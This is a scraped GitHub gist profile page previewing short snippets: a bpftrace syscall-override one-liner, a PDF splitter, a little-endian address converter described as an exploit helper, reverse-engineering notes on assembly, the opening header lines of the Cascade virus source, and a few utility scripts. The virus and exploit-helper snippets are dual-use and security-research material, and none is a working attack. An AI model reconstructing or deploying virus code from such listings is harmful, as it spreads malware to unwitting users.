Skip to content

Instantly share code, notes, and snippets.

View RC1140's full-sized avatar
🎿
NOP Sledding

Jameel RC1140

🎿
NOP Sledding
View GitHub Profile
sudo bpftrace -e 'k:__x64_sys_getuid /comm == "id"/ { override(99); }' --unsafe -c /usr/bin/id
@RC1140
RC1140 / gist:d0008fab2ed0d01859ef
Created September 16, 2014 17:09
splitDocument.py
from PyPDF2 import PdfFileWriter, PdfFileReader
input1 = PdfFileReader(open("fileToSplit.pdf", "rb"))
for i in range(input1.numPages):
output = PdfFileWriter()
output.addPage(input1.getPage(i))
outputStream = file('review'+i.__str__()+'.pdf', "wb")
output.write(outputStream)
outputStream.close()
@RC1140
RC1140 / convertToLitteEndian.py
Created December 5, 2013 12:56
Converts a memory address to little endian , useful for exploits and such , also prints the format used in an exploit.
import sys
if len(sys.argv) == 1:
sys.exit(-1)
memAddress = sys.argv[1]#'bffffe65'#
start = len(memAddress)
print(memAddress)
outAddress = ''
hexAddress = ''
for i in range(len(memAddress),0,-2):
start -= 2
_f proc near
var_10 = dword ptr -10h
var_9 = byte ptr -9
input = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
jmp short loc_8048410
loc_804840C:
add [ebp+input], 4
@RC1140
RC1140 / cascade.asm
Created March 17, 2013 20:16
Source code for the cascade virus
PAGE 62,132
TITLE _HLV_
SUBTTL Layout (C) 1990 164A12565AA18213165556D3125C4B962712
.RADIX 16
.LALL
TRUE EQU 1
FALSE EQU 0
MONTH EQU 9D
char toupper ( char c )
{
if( c >= ’a’ && c <= ’z’ ) {
c = c - ’a’ + ’A’;
}
return( c );
}
@RC1140
RC1140 / task1.1.asm
Last active December 15, 2015 01:38
_f proc near
input = dword ptr 8
push ebp ;Stack winding , remember where we came from.
mov ebp, esp ;Stack winding , update the current stack locations.
movzx eax, byte ptr [ebp+input] ; Move the byte value @ the address [ebp + input] and extend it if needed into the eax register
; eax now contains the the first 8 bytes of the stack for the current function which is your first parameter passed to the function
lea edx, [eax-61h] ; This subtracts 61h from eax (the parameter passed in ) and sets edx to the result.
; Assuming we passed in the letter 'a' , this would result in 61h - 61h == 0 in edx
cmp dl, 19h ; Compare the lower register of edx to 19h , if the value is less than 19h then we
; we know we are dealing with lower case letters. Otherwise this is an upper case letter or some other char which means we can ignore it.
@RC1140
RC1140 / customTtyTterOutput.pl
Created February 21, 2013 20:23
Small little extension for ttytter that allows you to highlight the names of certain users. I also changed the way tweets are displayed to suit my liking. To use it run ttytter -exts=customTtyTterOutput.pl
use Term::ANSIColor;
#Open a text file with a list of users to highlight
open our $handle, '<', "/home/<your username>/tweetersToHighlight.txt";
chomp(our @customConsole.pl = <$handle>);
#Convert array to hash/dictionary
our %users = map { $_ => 1 } @customConsole.pl;
close $handle;
#Setup ttytter hook
$handle = sub {
@RC1140
RC1140 / hola.diff
Created January 30, 2013 20:27
Hola patch to remove remote calls and lower permissions requirements.
diff --cc manifest.json
index 984792c,06d9aad..0000000
--- a/manifest.json
+++ b/manifest.json
@@@ -5,9 -5,7 +5,13 @@@
"proxy",
"webRequest",
"webRequestBlocking",
++<<<<<<< HEAD
+ "<all_urls>",
@RC1140
RC1140 / DynamicDNS.py
Last active October 8, 2015 07:29
DynamicDNS For Use With AmazonRoute53
#!/usr/bin/env python
import stun
import socket
import route53
domainName = ''#Make sure this is a FQDN i.e. it should have a '.' at the end.
access_id = ''
secret_key = ''
hostedZoneID = '' #Get this from your aws account